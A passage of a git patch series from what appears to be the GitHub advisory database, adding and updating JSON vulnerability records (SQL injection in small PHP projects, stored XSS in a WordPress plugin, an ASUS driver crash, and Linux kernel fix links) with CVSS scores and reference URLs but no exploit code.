"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5947" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xvq8-f2vm-qf3p/GHSA-xvq8-f2vm-qf3p.json b/advisories/unreviewed/2025/08/GHSA-xvq8-f2vm-qf3p/GHSA-xvq8-f2vm-qf3p.json new file mode 100644 index 0000000000000..5e76fd76ffe32 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xvq8-f2vm-qf3p/GHSA-xvq8-f2vm-qf3p.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xvq8-f2vm-qf3p", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54843" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54843" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:19Z" + } +} \ No newline at end of file From 203e58b95f90bf90b0a95b0715fd09b331efb75e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 09:33:27 +0000 Subject: [PATCH 290/323] Publish Advisories GHSA-8ccv-3j8r-hx7f GHSA-4748-h423-7xq4 GHSA-43x8-vph3-w4wc GHSA-f3wq-3888-8q7g GHSA-jm39-49q3-98mm GHSA-m2xx-pr2p-6vvw GHSA-mf4c-hrq6-7vxq GHSA-x77v-68j6-p42v GHSA-3c9j-8326-hh7c GHSA-5f3g-8rwp-2jf4 GHSA-5prv-pch2-5cpp GHSA-8x5w-3v8g-6653 GHSA-97wf-g3cv-jw4p GHSA-jvg3-4gv7-rjpq GHSA-rjr8-pf73-3289 GHSA-xxw5-6rch-9wmx --- .../GHSA-8ccv-3j8r-hx7f.json | 10 +++- .../GHSA-4748-h423-7xq4.json | 6 +- .../GHSA-43x8-vph3-w4wc.json | 6 +- .../GHSA-f3wq-3888-8q7g.json | 6 +- .../GHSA-jm39-49q3-98mm.json | 10 +++- .../GHSA-m2xx-pr2p-6vvw.json | 6 +- .../GHSA-mf4c-hrq6-7vxq.json | 6 +- .../GHSA-x77v-68j6-p42v.json | 6 +- .../GHSA-3c9j-8326-hh7c.json | 56 +++++++++++++++++++ .../GHSA-5f3g-8rwp-2jf4.json | 56 +++++++++++++++++++ .../GHSA-5prv-pch2-5cpp.json | 56 +++++++++++++++++++ .../GHSA-8x5w-3v8g-6653.json | 56 +++++++++++++++++++ .../GHSA-97wf-g3cv-jw4p.json | 40 +++++++++++++ .../GHSA-jvg3-4gv7-rjpq.json | 56 +++++++++++++++++++ .../GHSA-rjr8-pf73-3289.json | 56 +++++++++++++++++++ .../GHSA-xxw5-6rch-9wmx.json | 36 ++++++++++++ 16 files changed, 460 insertions(+), 8 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-3c9j-8326-hh7c/GHSA-3c9j-8326-hh7c.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5f3g-8rwp-2jf4/GHSA-5f3g-8rwp-2jf4.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5prv-pch2-5cpp/GHSA-5prv-pch2-5cpp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8x5w-3v8g-6653/GHSA-8x5w-3v8g-6653.json create mode 100644 advisories/unreviewed/2025/08/GHSA-97wf-g3cv-jw4p/GHSA-97wf-g3cv-jw4p.json create mode 100644 advisories/unreviewed/2025/08/GHSA-jvg3-4gv7-rjpq/GHSA-jvg3-4gv7-rjpq.json create mode 100644 advisories/unreviewed/2025/08/GHSA-rjr8-pf73-3289/GHSA-rjr8-pf73-3289.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xxw5-6rch-9wmx/GHSA-xxw5-6rch-9wmx.json diff --git a/advisories/unreviewed/2025/04/GHSA-8ccv-3j8r-hx7f/GHSA-8ccv-3j8r-hx7f.json b/advisories/unreviewed/2025/04/GHSA-8ccv-3j8r-hx7f/GHSA-8ccv-3j8r-hx7f.json index 9bb976009a480..e8b1a14eed4ef 100644 --- a/advisories/unreviewed/2025/04/GHSA-8ccv-3j8r-hx7f/GHSA-8ccv-3j8r-hx7f.json +++ b/advisories/unreviewed/2025/04/GHSA-8ccv-3j8r-hx7f/GHSA-8ccv-3j8r-hx7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8ccv-3j8r-hx7f", - "modified": "2025-04-29T18:30:52Z", + "modified": "2025-08-01T09:31:22Z", "published": "2025-04-18T15:31:38Z", "aliases": [ "CVE-2025-37925" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37925" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/28419a4f3a1eeee33472a1b3856ae62aaa5a649b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/45fd8421081ec79e661e5f3ead2934fdbddb4287" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8987891c4653874d5e3f5d11f063912f4e0b58eb" diff --git a/advisories/unreviewed/2025/05/GHSA-4748-h423-7xq4/GHSA-4748-h423-7xq4.json b/advisories/unreviewed/2025/05/GHSA-4748-h423-7xq4/GHSA-4748-h423-7xq4.json index ae75eb0fb7b68..11f02cd8ecda3 100644 --- a/advisories/unreviewed/2025/05/GHSA-4748-h423-7xq4/GHSA-4748-h423-7xq4.json +++ b/advisories/unreviewed/2025/05/GHSA-4748-h423-7xq4/GHSA-4748-h423-7xq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4748-h423-7xq4", - "modified": "2025-05-02T09:30:34Z", + "modified": "2025-08-01T09:31:22Z", "published": "2025-05-01T15:31:44Z", "aliases": [ "CVE-2025-37777" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/1aec4d14cf81b7b3e7b69eb1cfa94144eed7138e" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1da8bd9a10ecd718692732294d15fd801c0eabb5" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/21a4e47578d44c6b37c4fc4aba8ed7cc8dbb13de" diff --git a/advisories/unreviewed/2025/07/GHSA-43x8-vph3-w4wc/GHSA-43x8-vph3-w4wc.json b/advisories/unreviewed/2025/07/GHSA-43x8-vph3-w4wc/GHSA-43x8-vph3-w4wc.json index 03c382fcb42b7..a8301251bb1e7 100644 --- a/advisories/unreviewed/2025/07/GHSA-43x8-vph3-w4wc/GHSA-43x8-vph3-w4wc.json +++ b/advisories/unreviewed/2025/07/GHSA-43x8-vph3-w4wc/GHSA-43x8-vph3-w4wc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43x8-vph3-w4wc", - "modified": "2025-07-10T09:32:30Z", + "modified": "2025-08-01T09:31:23Z", "published": "2025-07-10T09:32:30Z", "aliases": [ "CVE-2025-38322" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38322" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/79e2dd573116d3338507c311460da9669095c94d" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/a85cc69acdcb05f8cd226b8ea0778b8e2e887e6f" diff --git a/advisories/unreviewed/2025/07/GHSA-f3wq-3888-8q7g/GHSA-f3wq-3888-8q7g.json b/advisories/unreviewed/2025/07/GHSA-f3wq-3888-8q7g/GHSA-f3wq-3888-8q7g.json index cb9ebb20ec203..7e5059b9906b1 100644 --- a/advisories/unreviewed/2025/07/GHSA-f3wq-3888-8q7g/GHSA-f3wq-3888-8q7g.json +++ b/advisories/unreviewed/2025/07/GHSA-f3wq-3888-8q7g/GHSA-f3wq-3888-8q7g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f3wq-3888-8q7g", - "modified": "2025-07-28T12:30:36Z", + "modified": "2025-08-01T09:31:23Z", "published": "2025-07-28T12:30:35Z", "aliases": [ "CVE-2025-38491" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/54999dea879fecb761225e28f274b40662918c30" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/75a4c9ab8a7af0d76b31ccd1188ed178c38b35d2" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/f8a1d9b18c5efc76784f5a326e905f641f839894" diff --git a/advisories/unreviewed/2025/07/GHSA-jm39-49q3-98mm/GHSA-jm39-49q3-98mm.json b/advisories/unreviewed/2025/07/GHSA-jm39-49q3-98mm/GHSA-jm39-49q3-98mm.json index 2bae2ba2d5c58..0990290efd64d 100644 --- a/advisories/unreviewed/2025/07/GHSA-jm39-49q3-98mm/GHSA-jm39-49q3-98mm.json +++ b/advisories/unreviewed/2025/07/GHSA-jm39-49q3-98mm/GHSA-jm39-49q3-98mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jm39-49q3-98mm", - "modified": "2025-07-10T09:32:31Z", + "modified": "2025-08-01T09:31:23Z", "published": "2025-07-10T09:32:31Z", "aliases": [ "CVE-2025-38335" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38335" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a7b79db25846459de63ca8974268f0c41c734c4b" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/ec8f5da79b425deef5aebacdd4fe645620cd4f0b" @@ -21,6 +25,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/f4a8f561d08e39f7833d4a278ebfb12a41eef15f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fa53beab4740c4e5fe969f218a379f9558be33dc" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-m2xx-pr2p-6vvw/GHSA-m2xx-pr2p-6vvw.json b/advisories/unreviewed/2025/07/GHSA-m2xx-pr2p-6vvw/GHSA-m2xx-pr2p-6vvw.json index fa7486b8bb185..30120a05ccea0 100644 --- a/advisories/unreviewed/2025/07/GHSA-m2xx-pr2p-6vvw/GHSA-m2xx-pr2p-6vvw.json +++ b/advisories/unreviewed/2025/07/GHSA-m2xx-pr2p-6vvw/GHSA-m2xx-pr2p-6vvw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m2xx-pr2p-6vvw", - "modified": "2025-07-04T15:31:10Z", + "modified": "2025-08-01T09:31:22Z", "published": "2025-07-04T15:31:10Z", "aliases": [ "CVE-2025-38221" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/28b62cb58fd014338f5004170f2e3a35bf0af238" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a4d60ba277ecd8a98c5a593cbc0ef2237c20a541" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/b5e58bcd79625423487fa3ecba8e8411b5396327" diff --git a/advisories/unreviewed/2025/07/GHSA-mf4c-hrq6-7vxq/GHSA-mf4c-hrq6-7vxq.json b/advisories/unreviewed/2025/07/GHSA-mf4c-hrq6-7vxq/GHSA-mf4c-hrq6-7vxq.json index 706cfedecd340..61eb3c3664d53 100644 --- a/advisories/unreviewed/2025/07/GHSA-mf4c-hrq6-7vxq/GHSA-mf4c-hrq6-7vxq.json +++ b/advisories/unreviewed/2025/07/GHSA-mf4c-hrq6-7vxq/GHSA-mf4c-hrq6-7vxq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mf4c-hrq6-7vxq", - "modified": "2025-07-10T09:32:31Z", + "modified": "2025-08-01T09:31:23Z", "published": "2025-07-10T09:32:31Z", "aliases": [ "CVE-2025-38325" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/3f3aae77280aad9f5acc6709c596148966f765c7" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52f5a52dc17a4a7b4363ac03fe2c4ef26f020dc6" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/a89f5fae998bdc4d0505306f93844c9ae059d50c" diff --git a/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json b/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json index 01fd392b25f3d..a25ed85f73785 100644 --- a/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json +++ b/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x77v-68j6-p42v", - "modified": "2025-07-19T12:30:34Z", + "modified": "2025-08-01T09:31:23Z", "published": "2025-07-19T12:30:34Z", "aliases": [ "CVE-2025-38351" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/2d4dea3f76510c0afe3f18c910f647b816f7d566" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f1b3ad11ec11c88ba9f79a73d27d4cda3f80fb24" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/fa787ac07b3ceb56dd88a62d1866038498e96230" diff --git a/advisories/unreviewed/2025/08/GHSA-3c9j-8326-hh7c/GHSA-3c9j-8326-hh7c.json b/advisories/unreviewed/2025/08/GHSA-3c9j-8326-hh7c/GHSA-3c9j-8326-hh7c.json new file mode 100644 index 0000000000000..9171b070a6ebf --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-3c9j-8326-hh7c/GHSA-3c9j-8326-hh7c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9j-8326-hh7c", + "modified": "2025-08-01T09:31:24Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-8442" + ], + "details": "A vulnerability has been found in code-projects Online Medicine Guide 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /cussignup.php. The manipulation of the argument uname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8442" + }, + { + "type": "WEB", + "url": "https://github.com/justconter/cve/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318469" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318469" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625678" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5f3g-8rwp-2jf4/GHSA-5f3g-8rwp-2jf4.json b/advisories/unreviewed/2025/08/GHSA-5f3g-8rwp-2jf4/GHSA-5f3g-8rwp-2jf4.json new file mode 100644 index 0000000000000..acf40304e98d8 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5f3g-8rwp-2jf4/GHSA-5f3g-8rwp-2jf4.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5f3g-8rwp-2jf4", + "modified": "2025-08-01T09:31:23Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-8437" + ], + "details": "A vulnerability classified as critical has been found in code-projects Kitchen Treasure 1.0. This affects an unknown part of the file /userregistration.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8437" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/16" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625555" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T07:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5prv-pch2-5cpp/GHSA-5prv-pch2-5cpp.json b/advisories/unreviewed/2025/08/GHSA-5prv-pch2-5cpp/GHSA-5prv-pch2-5cpp.json new file mode 100644 index 0000000000000..bd14230949656 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5prv-pch2-5cpp/GHSA-5prv-pch2-5cpp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5prv-pch2-5cpp", + "modified": "2025-08-01T09:31:24Z", + "published": "2025-08-01T09:31:24Z", + "aliases": [ + "CVE-2025-8443" + ], + "details": "A vulnerability was found in code-projects Online Medicine Guide 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument uname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8443" + }, + { + "type": "WEB", + "url": "https://github.com/LI1551/vul/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318470" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318470" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625697" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T09:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8x5w-3v8g-6653/GHSA-8x5w-3v8g-6653.json b/advisories/unreviewed/2025/08/GHSA-8x5w-3v8g-6653/GHSA-8x5w-3v8g-6653.json new file mode 100644 index 0000000000000..16f606269d8c1 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8x5w-3v8g-6653/GHSA-8x5w-3v8g-6653.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8x5w-3v8g-6653", + "modified": "2025-08-01T09:31:24Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-8441" + ], + "details": "A vulnerability, which was classified as critical, was found in code-projects Online Medicine Guide 1.0. Affected is an unknown function of the file /pharsignup.php. The manipulation of the argument phuname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8441" + }, + { + "type": "WEB", + "url": "https://github.com/justconter/cve/issues/2" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318468" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318468" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625677" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-97wf-g3cv-jw4p/GHSA-97wf-g3cv-jw4p.json b/advisories/unreviewed/2025/08/GHSA-97wf-g3cv-jw4p/GHSA-97wf-g3cv-jw4p.json new file mode 100644 index 0000000000000..59107ca311697 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-97wf-g3cv-jw4p/GHSA-97wf-g3cv-jw4p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97wf-g3cv-jw4p", + "modified": "2025-08-01T09:31:23Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-7646" + ], + "details": "The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom script parameter in all versions up to, and including, 6.3.10 even when the user does not have the unfiltered_html capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7646" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/6.3.11/modules/widgets/tp_hovercard.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/58fcab5e-c82e-4072-9a86-94a7f18a6e56?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T07:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-jvg3-4gv7-rjpq/GHSA-jvg3-4gv7-rjpq.json b/advisories/unreviewed/2025/08/GHSA-jvg3-4gv7-rjpq/GHSA-jvg3-4gv7-rjpq.json new file mode 100644 index 0000000000000..7d4cc0cc76905 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-jvg3-4gv7-rjpq/GHSA-jvg3-4gv7-rjpq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jvg3-4gv7-rjpq", + "modified": "2025-08-01T09:31:24Z", + "published": "2025-08-01T09:31:24Z", + "aliases": [ + "CVE-2025-8438" + ], + "details": "A vulnerability classified as critical was found in code-projects Wazifa System 1.0. This vulnerability affects unknown code of the file /controllers/postpublish.php. The manipulation of the argument post leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8438" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/15" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318466" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318466" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625556" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T07:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-rjr8-pf73-3289/GHSA-rjr8-pf73-3289.json b/advisories/unreviewed/2025/08/GHSA-rjr8-pf73-3289/GHSA-rjr8-pf73-3289.json new file mode 100644 index 0000000000000..5c3f507e487c2 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-rjr8-pf73-3289/GHSA-rjr8-pf73-3289.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjr8-pf73-3289", + "modified": "2025-08-01T09:31:23Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-8439" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Wazifa System 1.0. This issue affects some unknown processing of the file /controllers/updatesettings.php. The manipulation of the argument Password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8439" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/14" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318467" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318467" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625557" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T07:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xxw5-6rch-9wmx/GHSA-xxw5-6rch-9wmx.json b/advisories/unreviewed/2025/08/GHSA-xxw5-6rch-9wmx/GHSA-xxw5-6rch-9wmx.json new file mode 100644 index 0000000000000..db19fe5d2e3df --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xxw5-6rch-9wmx/GHSA-xxw5-6rch-9wmx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxw5-6rch-9wmx", + "modified": "2025-08-01T09:31:24Z", + "published": "2025-08-01T09:31:23Z", + "aliases": [ + "CVE-2025-6398" + ], + "details": "A null pointer dereference vulnerability exists in the IOMap64.sys driver of ASUS AI Suite 3. The vulnerability can be triggered by a specially crafted input, which may lead to a system crash (BSOD). Refer to the '\n\nSecurity Update for for AI Suite 3\n\n' section on the ASUS Security Advisory for more information.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": 